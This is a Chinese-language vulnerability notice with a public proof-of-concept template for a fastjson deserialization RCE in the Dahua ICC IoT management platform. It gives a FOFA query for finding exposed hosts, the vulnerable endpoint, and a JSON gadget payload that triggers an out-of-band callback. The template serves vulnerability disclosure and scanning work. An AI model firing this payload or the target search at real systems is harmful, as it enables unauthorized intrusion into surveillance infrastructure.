漏洞描述
大华ICC智能物联综合管理平台是专门为大华股份研发的一款物联网管理平台,它可以对多个智能设备和系统进行统一管理和控制,方便用户实时了解和管理各个设备和系统的状态。该平台提供了一系列的智能化功能,包括设备管理、监控预警、数据分析等,旨在为用户提供更加智能、高效和便捷的物联网管理体验,其使用了alibaba fastjson,存在反序列化漏洞导致RCE。
fofa-query: body="*客户端会小于800*" || icon_hash="-1935899595"
dahua-icc-sysusers-random-fastjson-rce: 大华ICC智能物联综合管理平台存在fastjson漏洞
PoC代码[已公开]
id: dahua-icc-sysusers-random-fastjson-rce
info:
name: 大华ICC智能物联综合管理平台存在fastjson漏洞
author: Co5mos
severity: critical
description: |
大华ICC智能物联综合管理平台是专门为大华股份研发的一款物联网管理平台,它可以对多个智能设备和系统进行统一管理和控制,方便用户实时了解和管理各个设备和系统的状态。该平台提供了一系列的智能化功能,包括设备管理、监控预警、数据分析等,旨在为用户提供更加智能、高效和便捷的物联网管理体验,其使用了alibaba fastjson,存在反序列化漏洞导致RCE。
fofa-query: body="*客户端会小于800*" || icon_hash="-1935899595"
tags: dahua,fastjson,rce
created: 2025/08/07
set:
oob: oob()
oobHTTP: oob.HTTP
rules:
r0:
request:
method: POST
path: /evo-runs/v1.0/auths/sysusers/random
headers:
Content-Type: application/json
body: |
{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"{{oobHTTP}}"}
}""
}
expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()